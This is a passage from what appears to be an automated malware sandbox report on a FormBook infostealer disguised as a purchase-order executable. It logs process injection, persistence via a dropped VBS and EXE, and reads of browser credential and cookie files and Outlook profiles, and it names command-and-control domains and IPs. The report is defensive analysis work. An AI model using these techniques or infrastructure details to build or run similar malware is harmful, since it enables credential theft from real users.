                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtQueryInformationToken: Direct from: 0x77D62CACJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtCreateFile: Direct from: 0x77D62FECJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtOpenFile: Direct from: 0x77D62DCCJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtOpenKeyEx: Direct from: 0x77D62B9CJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeMemory written: C:\Users\user\Desktop\P.Order request for quotations.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: NULL target: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\finger.exeThread register set: target process: 6116Jump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess created: C:\Users\user\Desktop\P.Order request for quotations.exe "C:\Users\user\Desktop\P.Order request for quotations.exe"Jump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe"Jump to behavior
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000000.1079628160.0000000001271000.00000002.00000001.00040000.00000000.sdmp, Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3361359506.0000000001271000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000000.1079628160.0000000001271000.00000002.00000001.00040000.00000000.sdmp, Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3361359506.0000000001271000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000000.1079628160.0000000001271000.00000002.00000001.00040000.00000000.sdmp, Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3361359506.0000000001271000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000000.1079628160.0000000001271000.00000002.00000001.00040000.00000000.sdmp, Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3361359506.0000000001271000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeQueries volume information: C:\Users\user\Desktop\P.Order request for quotations.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeQueries volume information: C:\Users\user\AppData\Roaming\HashSize.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 2.2.P.Order request for quotations.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.P.Order request for quotations.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3358405901.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3366174794.00000000063C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1160607644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3359171063.0000000002800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1187484394.0000000004640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3358967031.00000000025B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3362082192.00000000029A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1170345518.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 2.2.P.Order request for quotations.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.P.Order request for quotations.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3358405901.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3366174794.00000000063C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1160607644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3359171063.0000000002800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1187484394.0000000004640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3358967031.00000000025B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3362082192.00000000029A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1170345518.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting                      		Valid Accounts1
                      Scheduled Task/Job                      		111
                      Scripting                      		1
                      Abuse Elevation Control Mechanism                      		1
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		3
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Data Obfuscation                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Deobfuscate/Decode Files or Information                      		LSASS Memory113
                      System Information Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Scheduled Task/Job                      		312
                      Process Injection                      		1
                      Abuse Elevation Control Mechanism                      		Security Account Manager321
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron2
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		3
                      Obfuscated Files or Information                      		NTDS3
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput Capture4
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                      Registry Run Keys / Startup Folder                      		1
                      Software Packing                      		LSA Secrets2
                      Process Discovery                      		SSHKeylogging4
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job3
                      Virtualization/Sandbox Evasion                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634999 Sample: P.Order request for quotati... Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 39 www.splogi.xyz 2->39 41 www.moonavatar.xyz 2->41 43 16 other IPs or domains 2->43 59 Suricata IDS alerts for network traffic 2->59 61 Antivirus detection for URL or domain 2->61 63 Antivirus / Scanner detection for submitted sample 2->63 67 11 other signatures 2->67 10 P.Order request for quotations.exe 15 5 2->10         started        15 wscript.exe 1 2->15         started        signatures3 65 Performs DNS queries to domains with low reputation 41->65 process4 dnsIp5 51 196.251.83.222, 49682, 49688, 80 SONIC-WirelessZA Seychelles 10->51 33 C:\Users\user\AppData\Roaming\HashSize.exe, PE32 10->33 dropped 35 C:\Users\user\AppData\...\HashSize.vbs, ASCII 10->35 dropped 37 C:\Users\...\HashSize.exe:Zone.Identifier, ASCII 10->37 dropped 71 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->71 73 Injects a PE file into a foreign processes 10->73 17 P.Order request for quotations.exe 10->17         started        75 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->75 20 HashSize.exe 14 2 15->20         started        file6 signatures7 process8 signatures9 53 Maps a DLL or memory area into another process 17->53 22 Q1o6bM9jrUC5ov0.exe 17->22 injected 55 Antivirus detection for dropped file 20->55 57 Multi AV Scanner detection for dropped file 20->57 26 HashSize.exe 20->26         started        process10 dnsIp11 45 an05-prod-v.cdn-ng.net 43.251.56.78, 56931, 56932, 56933 WSN-TW-NET-ASWorldstarNetworkTW Taiwan; Republic of China (ROC) 22->45 47 www.xiongding.tech 111.119.219.195, 56963, 56964, 56965 SIPL-ASSysconInfowayPvtLtdIN India 22->47 49 7 other IPs or domains 22->49 69 Found direct / indirect Syscall (likely to bypass EDR) 22->69 28 finger.exe 13 22->28         started        signatures12 process13 signatures14 77 Tries to steal Mail credentials (via file / registry access) 28->77 79 Tries to harvest and steal browser information (history, passwords, etc) 28->79 81 Modifies the context of a thread in another process (thread injection) 28->81 83 2 other signatures 28->83 31 firefox.exe 28->31         started        process15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.